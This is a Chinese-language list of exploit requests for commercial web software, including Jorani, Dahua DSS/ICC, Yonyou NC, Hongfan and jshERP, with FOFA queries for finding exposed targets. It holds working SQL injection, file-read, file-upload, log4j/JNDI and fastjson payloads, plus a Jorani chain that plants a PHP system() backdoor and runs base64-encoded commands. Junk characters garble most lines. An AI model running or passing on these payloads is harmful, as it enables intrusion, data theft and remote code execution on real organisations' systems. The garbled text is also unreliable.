2 I6 q2 \% m4 \! V9 T- ]5 a" ~( l- cGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.14 B: L: q3 E; _' Y* v9 N
Host: 127.0.0.1
5 k0 j, c) n" y4 F7 QPragma: no-cache
2 k ^9 r5 q. r$ o; `6 G- DCache-Control: no-cache
* z3 W0 A- _) ?. l7 n/ T5 xUpgrade-Insecure-Requests: 1
5 G) v1 D6 J* b1 H. j' V9 X$ P6 TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.362 X8 A5 F$ V6 g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! ?2 L4 v( p, F2 w0 O2 RAccept-Encoding: gzip, deflate6 Q8 Z! Z* J2 a7 I" V
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
' B' ~3 w5 t2 M" GConnection: close# S. c/ P/ z5 T' {6 n! f
; R) |3 U R# q( |+ K5 }' I4 v% x& u* Y- F. `" q8 M+ d
12. Jorani < 1.0.2 远程命令执行
2 p8 J* F. U( eFOFA:title="Jorani"
9 r+ a2 h% p, S6 a5 F m9 L第一步先拿到cookie! y2 {/ A6 ^. w+ y) j' p2 K& K
GET /session/login HTTP/1.1
! x% ?0 i, c+ b, d) d4 a$ W6 S2 rHost: 192.168.190.30
* O. _. E: k/ m6 ~User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36# m4 _7 s& @' I$ z
Connection: close# e3 X" {/ M, {3 y2 l
Accept-Encoding: gzip7 m9 f- V9 R* D# {* Y4 l7 F7 i
/ D f+ s$ D* O4 Y+ m' {/ j
6 ?5 y2 P |) N" C
响应中csrf_cookie_jorani用于后续请求/ L) V( W. F( `/ z$ M) w
HTTP/1.1 200 OK
4 a. I4 p4 `3 \8 G9 IConnection: close1 f- E3 k. r- j7 o1 }
Cache-Control: no-store, no-cache, must-revalidate
. U! j5 P) H7 O* EContent-Type: text/html; charset=UTF-8
+ H3 h( w8 M# Z+ @5 X2 F3 a1 [! S* @Date: Tue, 24 Oct 2023 09:34:28 GMT
7 s$ ^ @# z1 b: o3 XExpires: Thu, 19 Nov 1981 08:52:00 GMT
5 V9 D0 T7 `* e1 YLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT) d, X3 A7 _4 B, Z1 Z+ l
Pragma: no-cache
8 ^& I' v6 q7 h6 M; V, }8 XServer: Apache/2.4.54 (Debian)
3 s! N0 p9 x8 R' R$ i r* fSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/( {2 e8 q! m4 v# _
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
+ U9 a% g7 x! aVary: Accept-Encoding
- E6 u2 L' _7 C( m P% }
" L/ _. U) }& q* x, j$ U6 Z! U$ V- [% A7 N# x+ k1 x3 E. N
POST请求,执行函数并进行base64编码
1 S% g! G, L* G5 mPOST /session/login HTTP/1.1
7 b9 K* y- P" M. N& h) MHost: 192.168.190.30: y3 P2 k+ B% x8 Y8 }% T
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.369 x( M/ p# l3 S1 n
Connection: close& P: a0 i" q' m) w6 M* l! J
Content-Length: 252" B, y# a( J* L
Content-Type: application/x-www-form-urlencoded
* \. K4 x$ q, YCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
) E5 E" z" w. ~Accept-Encoding: gzip6 t. V. ?# S% E
$ S) o6 ]! E! ?! V. }
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
5 Q5 J5 X0 y& A4 c1 B9 I' f* S! L4 |( j' _' p
h& Q6 Y: p4 X* L% D
9 ^% S9 U. q% M/ j' E向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串( C7 u* e0 j$ W& e, U6 G
GET /pages/view/log-2023-10-24 HTTP/1.1
7 Z: l5 m- f5 S: Z8 N7 M- PHost: 192.168.190.304 M5 |' p; l* p0 C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
( W( j' A% V" M+ Y% F( p7 X6 BConnection: close
7 o; E% @2 U. n9 \* Q8 pCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
! u1 w" m a% G- \8 y. H5 q6 LK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
% `, ~2 d, H+ q( h/ A; `X-REQUESTED-WITH: XMLHttpRequest
) t' [2 N8 j- q8 G3 _( }. yAccept-Encoding: gzip& w% o7 o! {+ X# z
- Y5 l$ s! Y. j, o/ t$ s
3 m" j) ?& w. E7 n# t' j5 H
13. 红帆iOffice ioFileDown任意文件读取
/ |& w# a$ z. GFOFA:app="红帆-ioffice"
: |8 h; s' H: n: |GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.13 \0 }* U' h& S% D
Host: x.x.x.x$ B6 M4 V2 n0 D) e
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36# {! O! r; y# c) @# m
Connection: close
- i, h* D3 ]$ aAccept: */*; W* d z& J8 u: O9 q0 Q# E
Accept-Encoding: gzip+ X m* E1 S- F3 f9 S" h
. r- k7 {' p, _& q
9 D, V$ M7 p$ K
14. 华夏ERP(jshERP)敏感信息泄露
! R$ p3 G# x5 @. DFOFA:body="jshERP-boot"
3 Q# }8 J, \! n8 P# l- {" l泄露内容包括用户名密码7 Y1 ~6 k% ~4 L* c5 i% c z
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
) ?+ ?7 Z+ |3 ?3 D9 ~Host: x.x.x.x2 q- u8 {* k3 p* P# ?' `/ U
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
v1 [: M* S! |. K1 K( c% nConnection: close
0 J$ e% {* S3 u, z: A4 Z }. D& `Accept: */*! S( g- h" i$ P( H" d
Accept-Language: en1 y# M3 d e+ n' j
Accept-Encoding: gzip0 L' o, X4 x# ~) [% W
* v* C: n, y3 U3 r
3 }: p$ g8 d; {; H- H15. 华夏ERP getAllList信息泄露
- Z" Q* }6 N/ Q- a0 ]% c$ ^5 mCVE-2024-04905 C* S2 s* O3 v! p
FOFA:body="jshERP-boot"1 C( k; o% O% `
泄露内容包括用户名密码* r3 _: G& Z6 J# q* C. E
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.14 @+ z4 c ^ N. \- Y' E
Host: 192.168.40.130:100
- |+ ?8 w$ o# }7 mUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
" n& o$ d/ c4 _Connection: close% g/ V2 x& E# u
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8$ I5 p! r1 R6 E& Y- Q! u4 [8 j
Accept-Language: en
. i3 a; C7 l/ p# n9 l Isec-ch-ua-platform: Windows7 Y& `& F9 W/ K) b! e3 ^- Q
Accept-Encoding: gzip
. H3 \. U) g5 J! a
0 H) ^7 P5 H l1 A: b+ h t% |) ~) j f: c7 S/ w! S q1 ^0 x+ h/ V
16. 红帆HFOffice医微云SQL注入3 Z' J2 [& V! b7 r
FOFA:title="HFOffice"* m4 ?" @- B6 O& }6 V4 x! g" G
poc中调用函数计算1234的md5值
@+ m1 {8 ^* W4 Q" g/ AGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1/ L* o7 s( P( @& A/ S6 b( c
Host: x.x.x.x6 d* r7 n6 `& R3 \: j
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
1 f9 @! I* ~$ _: A' J2 oConnection: close
( O8 m! y, \1 x4 F; F3 s9 lAccept: */*
$ P2 ]4 D" w2 h: J& i3 a* EAccept-Language: en; W( L3 p3 l3 ~! Y4 v: S( f% F, A
Accept-Encoding: gzip
- q+ O Q# Y r6 u; x
: |/ t2 I, D6 }* Z% Y* Y% {- w* _& l. Q) @
17. 大华 DSS itcBulletin SQL 注入
' |) ~/ Q& y* ]: q2 ~1 l! JFOFA:app="dahua-DSS"/ X! Z7 k) u7 v/ y K
POST /portal/services/itcBulletin?wsdl HTTP/1.1
6 b3 G o# H, rHost: x.x.x.x
0 H: j2 v, O' W5 W8 S8 ^User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% \" f- _4 U, V2 g+ @Connection: close6 s+ y- z! ]/ J
Content-Length: 345
9 |4 J8 e6 j! r( g/ P6 PAccept-Encoding: gzip
- X4 u- ~! c- C$ w. d6 E6 `% Q. A; \9 g
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>" Q: B- T6 L! P3 B. t9 P, u
<s11:Body>% x0 ]( V; T' N ~6 L. l- `
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>' K1 v7 X' z( T3 a) }
<netMarkings>4 }. V0 S9 k; ]" F: F, l3 K$ g9 t
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=13 r. k2 b& ?% w0 U! d+ a7 E
</netMarkings>
; d8 d) g- j; t8 ^) J4 ~ </ns1:deleteBulletin>
3 N- B i6 s, Y/ C </s11:Body>
% {% A8 i3 h8 I9 O</s11:Envelope>. |: r" S( {/ M# t' d8 |4 K! [$ O
- v9 p) Y8 ^7 @6 k5 p9 ?/ T- ~* W3 v. S8 d( d' @' x9 p
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
6 G: s. V& {5 H. h! R8 k' I" N% eFOFA:app="dahua-DSS") E! ^& a! u/ Z4 i8 y, ^
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
& l3 f# x9 B. dHost: your-ip
1 B% w0 P! o. I& ~$ o) fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.367 \; h) a9 I! c& o- x- B
Accept-Encoding: gzip, deflate
. p2 [/ x* v; J6 i: l7 p( ]Accept: */*1 O! I. m) s G# X
Connection: keep-alive0 Q5 M0 q: P* @. J- S2 i- U9 N
9 _# |* _% ~7 P: y5 J/ M
! U- O! `2 `) C" f) f1 s) w. H- F$ A% @4 T/ H0 H& L8 i; I' i
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入: G! O) H) z* w0 [0 b
FOFA:app="dahua-DSS"5 ^6 m9 N6 q! Q0 H2 }
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
- O; r) V3 f* |( GHost:2 h7 W# j% Y* a/ f
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
+ k' f) K' Q9 YAccept-Encoding: gzip, deflate
% [. X! p0 S5 V% `7 }0 `0 \# a4 |1 r5 fAccept: */*) n" I) S' a' Z4 g* i8 p6 [+ }
Connection: keep-alive0 D% D' O! C! I3 w8 r
- E1 d+ \8 s$ i/ y
' L8 j) U: x+ S. m4 R7 ]/ r. I20. 大华ICC智能物联综合管理平台任意文件读取
% f) V4 | a9 W9 k7 c, sFOFA:body="*客户端会小于800*"4 u/ x2 |0 ?. g7 B [8 X) K
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
, G) F, j# P2 [8 j2 DHost: x.x.x.x
6 r1 ^" [/ l; {1 z1 M! gUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36- h7 g- ?" c. Y. Q0 [0 ?
Connection: close
+ N! g9 g4 ~1 R& jAccept: */** t/ d. ?' H0 L# r* w1 c, u# S
Accept-Language: en
2 s& ?7 Z4 X' U( s) VAccept-Encoding: gzip- r5 b; d& R! O @
8 d& E0 P6 B% \: C7 |8 Y9 B+ s: ?2 h
21. 大华ICC智能物联综合管理平台random远程代码执行8 i& p" y, P: _% C! p& I
FOFA:icon_hash="-1935899595"3 U# F% i3 P! R e# P9 n0 I
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.19 i, c6 u9 n2 S. L( ~* f
Host: x.x.x.x
& _9 J7 J6 Q# ^3 ~9 _( q2 XUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15, e' H5 E( J1 }6 [
Content-Length: 161; A2 g2 U$ B# \
Accept-Encoding: gzip/ Z. U% I+ P, C- F
Connection: close2 V) m2 o3 h9 i! W: w
Content-Type: application/json;charset=utf-8
5 d9 q( v6 j' y, f5 O6 O/ y( Z6 _" \; Z7 m; K! N7 \* g; C
{
6 K+ D% l( R, m4 o# |"a":{
8 j3 \9 z! w4 q "@type":"com.alibaba.fastjson.JSONObject",
1 K& ?3 z- s& v {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}7 q# `; o2 [! ^& Y- K& P
}""
' y; M, N8 N/ H1 t& ?# l4 J0 L}
4 G% l# o% B4 _' c6 x1 a. i6 ?/ N) a- x2 T$ t9 o6 k1 v
5 p0 W, H' f; o) a22. 大华ICC智能物联综合管理平台 log4j远程代码执行1 i: z$ Y+ G- Y) n: w' }
FOFA:icon_hash="-1935899595"2 `% S8 t i4 s }. p8 l! L
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.17 @& A6 `* L+ I( L3 _- i
Host: your-ip
+ T. P# i& A3 z% f% j5 l( GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36$ @% U. d6 ?. U2 l
Content-Type: application/json;charset=utf-8$ f! W7 _- }+ n2 ~! p T2 @" n
! b$ f( ^! A. P! Z8 U( D{
$ ^& f. ^) }2 h2 ]9 @ F5 M"loginName":"${jndi:ldap://dnslog}"$ X K* a$ w, a$ B5 s
}
0 s% V6 Z0 D8 ~$ B
! ?$ D2 v$ N8 {' C. H5 j+ o& I$ d0 J3 f* m1 S" y; L+ z8 a# t6 w
$ n3 J& @. B0 `( J$ {& Y+ d
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行% z, x! a! E* I1 X( f
FOFA:icon_hash="-1935899595"
/ }: R) m8 J% O3 H% a( APOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.14 t A; \1 _ t I
Host: your-ip
; X; |; H# t& g; C8 q2 Z5 WUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.157 h$ X. q3 D3 W0 y3 @/ w
Content-Type: application/json;charset=utf-8
7 L/ T# r( p1 T( C' |) gAccept-Encoding: gzip7 @2 K' k4 g( W5 q5 u6 l
Connection: close: [3 h0 F: v5 l5 x1 M0 x1 Z
. t; x) {6 j9 I2 Z/ w* h8 K$ P# _{
. A$ n1 C& u: j" W5 P "a":{) [$ v. _2 x( |, B; t4 Y" u+ x
"@type":"com.alibaba.fastjson.JSONObject",* A! h- X6 J2 b" `5 A
{"@type":"java.net.URL","val":"http://DNSLOG"}! G' n4 U6 c% k
}""
$ f, u" N6 _3 g' y: C7 v' @8 a* M}; G; z$ O( p# o5 c
l$ Z) k( q3 y/ f
9 `- W0 ~% [+ H, v! w24. 用友NC 6.5 accept.jsp任意文件上传
+ c: D3 [9 c& T& S$ yFOFA:icon_hash="1085941792"
# y- E2 j* s! D$ rPOST /aim/equipmap/accept.jsp HTTP/1.1
4 f4 Z% o* S& `& b2 L* eHost: x.x.x.x
' N8 W$ V& P! M+ N) ^/ g" UUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.369 a) V3 h+ ?7 A) M+ `% p# W7 r
Connection: close4 o. g$ u4 e7 X/ L
Content-Length: 449
5 n( b* s# v1 r2 [1 K) }1 U- p; u) DAccept: */*
9 O z' w y- w( P0 WAccept-Encoding: gzip2 {7 F$ \) F+ Q& `/ R, m6 e; C
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
) V9 G7 o( y! l6 v2 c7 }' T) I+ ~: ]. g% c" @( o9 @4 l9 E
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc5 ]* z' o8 U! Z5 R
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
2 k/ _! [, b/ q# ~: qContent-Type: text/plain
N$ s. c3 V' D7 N; }- @, D9 M. R% F6 j# q1 f8 J5 e8 G+ `
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
w8 a! g7 C4 e) p* ?-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc$ X8 j7 u: F1 `. @( E4 H4 S
Content-Disposition: form-data; name="fname": P+ d$ B( F' {# C# b
# N! p/ ?6 J) s4 Q7 ^; c
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
1 D- I! w2 b3 w; ]3 R-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--( G, L* F; U7 k0 X! v. W
- \ q9 F3 W3 |' O o' b' M+ ?
6 N* g0 q/ F: l! h7 G# ?4 h
25. 用友NC registerServlet JNDI 远程代码执行( ?' M! [% T* H ^2 ~, ?! n8 m
FOFA:app="用友-UFIDA-NC"
# {1 @, N& @- y4 H9 W5 W$ nPOST /portal/registerServlet HTTP/1.1! N; z$ Q, O3 |2 R
Host: your-ip
% }+ V3 j( k2 e$ @4 g1 dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
+ E) `7 [" Q p: m( W& z) U, uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
, y' W4 U" c& ?8 g" M, qAccept-Encoding: gzip, deflate
% H, [/ z' `5 T7 v) ^% j$ A' p& z" V1 uAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
2 a( x3 m7 z8 bContent-Type: application/x-www-form-urlencoded! P6 C/ b5 E! L* r" U# T
% ~4 r/ ^* T0 d' U" v: Z& o: H
type=1&dsname=ldap://dnslog2 w p6 X2 ?. T5 [2 s
/ }* m+ X4 i; J9 p4 B/ d; d
+ m+ b/ n2 {( s. P: T7 `6 U V+ p- \: z2 T& A6 H
26. 用友NC linkVoucher SQL注入
6 b M* D5 ?5 Z) ?9 w6 b# S8 TFOFA:app="用友-UFIDA-NC"
+ J' X0 o2 {) p# {9 QGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.19 E+ {4 {' R- N c8 }/ k) P( O' \7 y8 J
Host: your-ip( m, n3 \3 ]- f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.368 q, c3 I k% e
Content-Type: application/x-www-form-urlencoded8 Q$ z) q5 s5 l7 s, y% n Z' b+ C
Accept-Encoding: gzip, deflate
, c/ J7 `. M" }9 B5 y+ F% k& [" aAccept: */*
) {+ @& [/ n+ U4 ]1 P1 l* DConnection: keep-alive
/ L7 Q& ^& ~, y( R @
0 v( [/ X; X8 u6 Q0 ~
( I3 p, P5 ]- n% o2 L. r! W' v27. 用友 NC showcontent SQL注入4 f& C+ a+ k& L% e( F
FOFA:icon_hash="1085941792"; U8 Z: {- o: Z( N% ?+ ~
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
% J( {, @4 N4 R; ?Host: your-ip
* L# O$ Q' S+ x/ a3 SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36' \! y. n/ X0 h$ h
Accept-Encoding: identity' m! I9 G. B7 e' Y9 f; ?
Connection: close
: R% N8 a" g8 l5 j y/ B. {; LContent-Type: text/xml; charset=utf-88 h/ B' m6 [! m
' x, ]+ r P3 w, R( h2 d+ r E
4 f9 p: O8 Y- p \- c28. 用友NC grouptemplet 任意文件上传) } F7 J) G) t; [, W$ l9 I5 z6 b
FOFA:icon_hash="1085941792"
; F5 m6 y; W5 E! n( s. Y$ oPOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1) {8 N }2 ^: j: g9 G* F
Host: x.x.x.x
3 v, f7 W, Q) Q' l w& X, r3 L3 GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36/ C9 Z) J4 e2 R6 z' i) _
Connection: close
% `6 @ n1 ]! P* @# G9 O; ~Content-Length: 268
! r$ q4 k) a+ {( e( XContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
* J# D3 A4 n, n# h, F$ N% tAccept-Encoding: gzip J% y: Y0 j5 I& V2 |
- j. g$ J! [/ {9 j! @0 I3 Q
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk/ `3 s8 ?9 E( E. w) u# c" m0 I
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"- H5 }' ^- ^; S1 }- s
Content-Type: application/octet-stream
. A0 n x8 w) X/ e" f2 O, S, L; b" w
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>& Q }& i0 _" j2 P- _
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--/ h! r7 m0 w' }2 l
% w4 r6 W4 p5 K
1 A* o; ]( H& y; @5 w/uapim/static/pages/nc/head.jsp# `* {( ^# {( r9 e. q
# X9 I; [7 V3 P( z. k
29. 用友NC down/bill SQL注入
5 n/ B5 w8 u5 M$ f SFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
3 O v* L4 D! |3 VGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.14 d- F8 G4 Z" N* N# C: Z: C2 L
Host: your-ip
1 v8 U8 X% n, S) A! _3 m' R* rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.363 g- f: O) S* `; W! q+ l& O
Content-Type: application/x-www-form-urlencoded
8 [+ `7 z5 n+ K0 K; H2 E, {- C3 V* sAccept-Encoding: gzip, deflate) d* e+ p$ t$ I
Accept: */*, N3 l% {: w2 v4 [: r! u
Connection: keep-alive
" y/ R* N4 O2 j. E# u8 m8 |; N7 Q# w: p. O. P6 [7 v: k- T
# ~% U W& m2 |3 |6 u3 j; u8 m
30. 用友NC importPml SQL注入
& S% ?( Q# _ B7 G+ SFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
% ]' ]* E+ s9 {+ _7 t9 ?2 \/ IPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1- i# e) L; o- B) D- A: J! w& k
Host: your-ip8 f" `1 _/ t7 ?8 s: o& ?
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V( e6 n$ v! o1 h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.362 `$ B$ A: Q d" p
Connection: close+ x! @: }4 W" X. z; A
6 N- c: O& \. E7 S9 O+ u------WebKitFormBoundaryH970hbttBhoCyj9V
0 H$ Z0 W! N2 f7 `0 v* c3 tContent-Disposition: form-data; name="Filedata"; filename="1.jpg"
" m) B8 |; f( c1 X4 V I- ZContent-Type: image/jpeg- |9 t% ^8 ]* ^* k
------WebKitFormBoundaryH970hbttBhoCyj9V--
7 ?6 I5 W0 i! V' ?+ G0 M( O4 d) O. R0 Y
) c) X8 a% r9 s* W2 O; R31. 用友NC runStateServlet SQL注入3 K/ W0 \4 G5 b+ i! ]2 D
version<=6.50 o3 x) J8 D( i& F
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"( m5 b$ Q/ c7 H- k7 N0 j" |, E9 E0 `
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
2 J# _3 X$ W; Y4 lHost: host' U, c2 c4 W5 Q4 X0 b3 l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.368 x& o- c* q( A) `9 T* W" l
Content-Type: application/x-www-form-urlencoded
+ V- |, B+ ~" o |9 g. H- c/ o, g7 Q9 D/ e& t+ w& S2 X- ?
9 T9 o! y6 j# e# F6 F/ I32. 用友NC complainbilldetail SQL注入
7 v3 C i9 J+ Eversion= NC633、NC65
4 @ N' j# R, O9 t% I; Y" u2 bFOFA:app="用友-UFIDA-NC"7 E; e9 T* z9 s
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
% b. c. X& f V! j- O) x" `Host: your-ip4 o8 n. I q- L4 z. Y6 C2 B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.369 y% |8 i) `5 N, q9 l- R8 ?, ?* i
Content-Type: application/x-www-form-urlencoded* I* ?( p5 u* O# ~. ` y& [# i
Accept-Encoding: gzip, deflate' Y0 N: C* t6 E% r' t8 E
Accept: */*
% v) h1 c4 z0 l" E& Y2 |Connection: keep-alive
; y5 m: Q! Y9 E. h+ Q: j
2 z! L. O* i$ W* U% V G8 d
% O: `4 c6 C9 Z v$ X! z33. 用友NC downTax/download SQL注入6 _" C0 b- z( z& x
version:NC6.5FOFA:app="用友-UFIDA-NC"/ L k! b' `, Y$ `6 R! c% y
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
" `# X3 G) y- }! XHost: your-ip) Q6 m A! B, K3 ?, Q8 Q2 V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
2 f! ~, w r- ~. b6 z+ qContent-Type: application/x-www-form-urlencoded
1 w S! `2 W& W) aAccept-Encoding: gzip, deflate
9 ?: k6 j# F2 _Accept: */*
8 S7 E9 \" D% ?) }% {! S' ~$ YConnection: keep-alive {' o+ I# Y: j9 g& k
0 w" Y, r7 Y" ~7 ?
4 _& l$ {. P1 ]; z
34. 用友NC warningDetailInfo接口SQL注入) `* C3 o/ d# W( ^
FOFA:app="用友-UFIDA-NC"
1 ^% a2 r: t6 e( ^6 CGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
8 h+ U- N& ?) r' K' |Host: your-ip
z) P5 v9 v5 M" yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36& _' n4 M6 [4 M% [5 O2 W
Content-Type: application/x-www-form-urlencoded
3 X0 ^5 s$ [, C4 x) u2 ?Accept-Encoding: gzip, deflate
* C5 t/ k" e- B- d. ]; uAccept: */*
4 n5 K) Q$ R5 |% `Connection: keep-alive3 U& i8 ?' {' G9 \ f
) A0 N3 c+ A" W" n
! A4 b1 Q5 U) @! a8 K) ?' c" A35. 用友NC-Cloud importhttpscer任意文件上传3 l! `; H0 x6 z z
FOFA:app="用友-NC-Cloud"4 z# I; X Q% ]& v& L
